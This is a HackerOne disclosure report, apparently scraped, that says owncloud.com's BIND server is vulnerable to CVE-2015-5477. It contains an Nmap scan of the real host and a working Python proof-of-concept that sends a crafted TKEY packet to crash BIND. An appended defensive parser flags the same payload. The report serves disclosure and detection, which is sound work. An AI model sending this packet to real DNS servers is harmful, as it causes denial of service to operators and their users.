HackerOne report H1:89097, reported by 1n3 (source: hackerone.com), Sep 15, 2015 - 8:11 p.m.

ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

Date: 2015-09-15 20:11:07
Reporter: 1n3
Source: hackerone.com

CVSS2: 7.8 High (AV:N/AC:L/Au:N/C:N/I:N/A:C)
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: COMPLETE

EPSS: 0.973 High (percentile 99.8%)

owncloud.com appears to be vulnerable to CVE-2015-5477 based on the version of BIND it is running. This allows attackers to launch denial-of-service attacks against owncloud.com, which would cause the ownCloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC BIND.

Nmap scan results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.9.4-rpz2.13269.14-P2

Exploit PoC:

Exploit Title: PoC for BIND9 TKEY DoS

Exploit Author: elceef

Software Link: https://github.com/elceef/tkeypoc/

Version: ISC BIND 9

Tested on: multiple

CVE : CVE-2015-5477

#!/usr/bin/env python

import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

# Raw DNS datagram from the original PoC: a TKEY query (QTYPE 0x00f9) with one additional record.
# bytes.fromhex() replaces the Python 2-only str.decode('hex') in the original listing.
payload = bytes.fromhex('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', ''))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')
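As an added defensive example (not part of this report or of the tkeypoc project): a minimal parser that decodes the header and question section of a DNS datagram and flags inbound queries whose QTYPE is TKEY (249, the 0x00f9 in the PoC bytes above), so that a UDP/53 capture or tap can alert on them. The two sample datagrams are constructed inline: the PoC packet quoted in this report and a hand-built benign A query for www.owncloud.com.

```python
import struct

TKEY_QTYPE = 249  # RR type TKEY (RFC 2930); appears as 00 f9 in the PoC datagram above

# Constructed samples: the PoC datagram quoted in this report, and a benign A query.
POC_PACKET = bytes.fromhex((
    "4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff "
    "03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41"
).replace(" ", ""))
BENIGN_PACKET = (
    b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"  # header: RD set, one question
    + b"\x03www\x08owncloud\x03com\x00"                  # QNAME www.owncloud.com
    + b"\x00\x01\x00\x01"                                # QTYPE A, QCLASS IN
)


def _read_name(packet, offset):
    """Decode an uncompressed DNS name at offset; return (dotted name, next offset)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not handled in this sample")
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def parse_query(packet):
    """Return header fields and the first question of a DNS datagram as a dict."""
    if len(packet) < 12:
        raise ValueError("too short for a DNS header")
    txid, flags, qdcount, _an, _ns, arcount = struct.unpack("!6H", packet[:12])
    if qdcount < 1:
        raise ValueError("no question section")
    qname, off = _read_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "qr": bool(flags & 0x8000), "qname": qname,
            "qtype": qtype, "qclass": qclass, "arcount": arcount}


def is_suspicious_tkey_query(packet):
    """True for an inbound query (QR=0) with QTYPE TKEY; TKEY is rarely seen at a public server."""
    try:
        q = parse_query(packet)
    except (ValueError, IndexError, struct.error):
        return False  # malformed or truncated datagram: not a parseable TKEY query
    return not q["qr"] and q["qtype"] == TKEY_QTYPE


if __name__ == "__main__":
    for label, pkt in (("poc", POC_PACKET), ("benign", BENIGN_PACKET)):
        print(label, parse_query(pkt), "ALERT" if is_suspicious_tkey_query(pkt) else "ok")
```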

CVE Details:
https://vulners.com/cve/CVE-2015-5477
